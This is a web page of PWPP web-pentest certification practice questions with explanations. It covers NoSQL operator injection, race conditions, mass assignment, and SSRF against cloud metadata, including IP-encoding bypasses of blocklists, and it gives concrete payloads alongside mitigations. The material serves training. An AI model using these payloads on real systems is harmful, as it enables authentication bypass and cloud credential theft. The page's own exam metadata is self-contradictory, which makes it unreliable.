All Practice Exams
100+ Free PWPP Practice Questions
TCM Security Practical Web Pentest Professional practice questions are available now; exam metadata is being verified.
✓ No registration✓ No credit card✓ No hidden fees✓ Start practicing immediately
100+ Questions
100% Free
1 / 100
Question 1
Score: 0/0
A web application uses Flask-Login for session management. The session cookie is base64-encoded and contains `{"user_id": 42, "is_admin": false}` signed with a weak Flask SECRET_KEY. An attacker uses flask-unsign to brute-force the secret. Which command correctly performs this attack?
A
B
C
D
to track
Same family resources
Explore More TCM Security Practical Certifications
Continue into nearby exams from the same family. Each card keeps practice questions, study guides, flashcards, videos, and articles in one place.
2026 Statistics
Key Facts: PWPP Exam
$499
Exam Cost
TCM Security
3 days
Assessment Window
TCM Security
2 days
Report Submission Deadline
TCM Security
1 free
Retake Included
TCM Security
16+ hours
Included Course Content
TCM Security
Non-expiring
Credential Validity
TCM Security
The PWPP is TCM Security's practical web pentest certification targeting intermediate-advanced practitioners. The 3-day hands-on exam tests real-world exploitation skills: NoSQL injection, SSRF (including cloud metadata), SSTI (Jinja2/Twig/Freemarker), race conditions via Turbo Intruder, OAuth/JWT attack chains, mass assignment, WAF bypass, and vulnerability chaining. A professionally written report must be submitted within 2 days after the assessment. Cost is $499 including one free retake and 12 months of access to Practical Web Hacking and Practical API Hacking courses. No flags, no multiple-choice — pure real-world engagement.
Sample PWPP Practice Questions
Try these sample questions to test your PWPP exam readiness. Each question includes a detailed explanation. Start the interactive quiz above for the full 100+ question experience with AI tutoring.
1A web application uses MongoDB and constructs a login query as `db.users.find({username: req.body.username, password: req.body.password})`. An attacker submits `{"username": "admin", "password": {"$ne": null}}`. What type of attack is this?
A.NoSQL injection using MongoDB operator injection
B.SQL injection using UNION-based technique
C.LDAP injection exploiting DN metacharacters
D.XML injection targeting XPATH queries
Explanation: This is a NoSQL injection attack exploiting MongoDB's operator syntax. By submitting `{"$ne": null}` as the password value, the attacker injects a comparison operator that evaluates to true for any non-null stored password, bypassing authentication without knowing the actual credential. MongoDB operators like `$ne`, `$gt`, `$regex`, and `$where` can be injected when input is not sanitized before being used in query construction.
2When testing a MongoDB application for NoSQL injection, which of the following payloads injected in a URL parameter is most likely to cause an authentication bypass via operator injection?
A.' OR '1'='1
B.admin'--
C.[$ne]=invalid
D.1; DROP TABLE users--
Explanation: The `[$ne]=invalid` payload exploits how PHP and some frameworks parse array-style query parameters, converting them to `{"field": {"$ne": "invalid"}}` in MongoDB queries. This injects the `$ne` (not equal) operator, making the condition true when the field value differs from 'invalid' — which almost always succeeds, bypassing authentication. This is a classic GET-parameter NoSQL injection technique.
3An application endpoint processes JSON and is vulnerable to NoSQL injection. To extract data character-by-character from a MongoDB field using blind injection, which operator would an attacker use?
A.$where with JavaScript sleep for time-based inference
B.$text for full-text search index abuse
C.$regex to test field values matching partial patterns
D.$lookup to join across collections and extract data
Explanation: The `$regex` operator enables blind NoSQL injection by testing whether a field matches a partial pattern. An attacker can submit payloads like `{"password": {"$regex": "^a"}}` and enumerate characters one-by-one based on whether the response differs (e.g., user found vs. not found). This boolean-based blind extraction works similarly to blind SQL injection but uses MongoDB's native regex matching.
4A banking application transfers funds through a POST endpoint. Two simultaneous requests are sent to transfer the same $500 balance to different accounts. Both requests read the balance as $500 and proceed. This results in $1000 being transferred despite only $500 existing. What vulnerability class is this?
A.Race condition / TOCTOU vulnerability
B.Insecure Direct Object Reference (IDOR)
C.Mass assignment via unfiltered parameters
D.Business logic flaw via parameter tampering
Explanation: This is a race condition (Time-of-Check to Time-of-Use / TOCTOU) vulnerability. Both requests check the balance at the same moment (time-of-check), both see $500 available, and both proceed to debit (time-of-use) before either write completes. Proper mitigations include database-level transactions with locks, optimistic/pessimistic locking, or atomic compare-and-swap operations to prevent concurrent reads before a write commits.
5Which Burp Suite feature is specifically designed to send multiple identical or crafted HTTP requests simultaneously to exploit race conditions?
A.Repeater with multiple tabs synchronized
B.Intruder with Pitchfork attack type
C.Turbo Intruder with race-condition script
D.Scanner with active race-condition check
Explanation: Turbo Intruder is a Burp Suite extension purpose-built for sending large numbers of HTTP requests with precise timing control. Its race-condition example scripts use HTTP/2 single-packet attacks or carefully timed HTTP/1.1 last-byte synchronization to deliver multiple requests within the same server processing window — maximally exploiting TOCTOU race conditions. The `race-single-packet-attack.py` template is designed specifically for this scenario.
6An application uses a single-use discount coupon system. After redeeming a coupon, the server marks it as used in the database. A tester submits 20 redemption requests simultaneously using Turbo Intruder. The coupon is applied 3 times before the 'used' flag is set. Which technique most effectively prevents this?
A.Rate limiting the redemption endpoint to 1 request per second
B.Implementing client-side validation before server processing
C.Using a database-level unique constraint and atomic upsert on coupon redemption
D.Adding a CAPTCHA to the redemption form
Explanation: A database-level unique constraint combined with an atomic operation (such as an `INSERT ... WHERE NOT EXISTS` or `UPDATE ... WHERE used=false RETURNING id`) ensures that only one redemption can succeed even under concurrent load. The database enforces mutual exclusion at the storage layer, preventing the TOCTOU window that exists in application-level check-then-act logic. Rate limiting and CAPTCHAs can be bypassed or circumvented and don't address the root atomic operation requirement.
7A REST API uses a Node.js/Express framework and automatically binds all JSON body parameters directly to a Mongoose model: `User.create(req.body)`. An attacker sends `{"username": "attacker", "email": "a@b.com", "isAdmin": true}`. The `isAdmin` field is silently set. What vulnerability is this?
A.Insecure Deserialization via JSON payload
B.Prototype Pollution via __proto__ injection
C.Mass Assignment vulnerability
D.Broken Object Level Authorization
Explanation: Mass Assignment occurs when an application automatically binds user-controlled input to model properties without filtering which fields are allowed. By sending `isAdmin: true` in the request body, the attacker elevates their own privileges because the ORM maps all submitted fields to the model. The fix is to use allowlist-based parameter filtering (e.g., Mongoose's `select`, Express-validator field whitelisting, or explicit property assignment) to only permit safe fields.
8During API testing, you discover a PUT /api/users/profile endpoint that accepts JSON. The API documentation only mentions `name`, `email`, and `bio` fields. Which Burp Suite technique best helps identify hidden mass-assignable parameters?
A.Send the request to Repeater and manually add common field names like role, admin, isVerified
B.Use Intruder Sniper mode with a wordlist of common parameter names to fuzz the JSON body
C.Enable Burp Scanner passive checks on the endpoint response
D.Use the Param Miner extension to discover undocumented parameters via response comparison
Explanation: Param Miner is a Burp Suite extension specifically designed to discover hidden, undocumented, or unused parameters that an application accepts but doesn't advertise. It performs intelligent guessing and response-difference analysis to identify parameters that affect server behavior. For mass-assignment testing, Param Miner can uncover backend model fields not exposed in the API documentation by detecting response changes when unknown fields are submitted.
9A web application fetches a URL specified by the user: `fetch(req.body.url)`. An attacker submits `http://169.254.169.254/latest/meta-data/iam/security-credentials/`. The server returns AWS IAM credentials. What is this attack?
A.Server-Side Request Forgery (SSRF) targeting cloud metadata
B.Open Redirect to internal metadata service
C.XML External Entity (XXE) injection via URL parameter
D.Remote File Inclusion (RFI) exploiting the URL loader
Explanation: This is Server-Side Request Forgery (SSRF). The server-side fetch makes an HTTP request on behalf of the attacker to the AWS Instance Metadata Service (IMDS) at the link-local address 169.254.169.254. This service is only accessible from within the EC2 instance, so the server's internal network position is abused to retrieve IAM role credentials — which can then be used to access AWS resources. Mitigations include IMDSv2 (requiring token-based session), allowlisting permitted URL destinations, and blocking link-local ranges.
10An SSRF filter blocks requests to `169.254.169.254`. Which bypass technique most likely succeeds against a naive blocklist implementation?
A.Encoding the IP as `%31%36%39%2E%32%35%34%2E%31%36%39%2E%32%35%34` (URL encoding)
B.Appending a port number: `169.254.169.254:80`
C.Using the decimal representation `2852039166` or IPv6 equivalent `::ffff:169.254.169.254`
D.Adding a path traversal: `169.254.169.254/../../etc/passwd`
Explanation: Blocklists that check for the literal string `169.254.169.254` can be bypassed using alternative IP representations: the decimal integer `2852039166` is mathematically equivalent and resolves to the same IP. IPv6 notation `::ffff:169.254.169.254` (IPv4-mapped IPv6 address) also resolves to the same link-local destination but is a different string. Both bypass string-matching blocklists. Proper SSRF mitigations use allowlists, resolve hostnames server-side and re-check after DNS resolution, and block link-local ranges at the network layer.
About the PWPP Practice Questions
Verified exam format metadata for TCM Security Practical Web Pentest Professional is pending. The practice questions above remain available while official exam length, timing, passing score, fee, and administrator details are reviewed.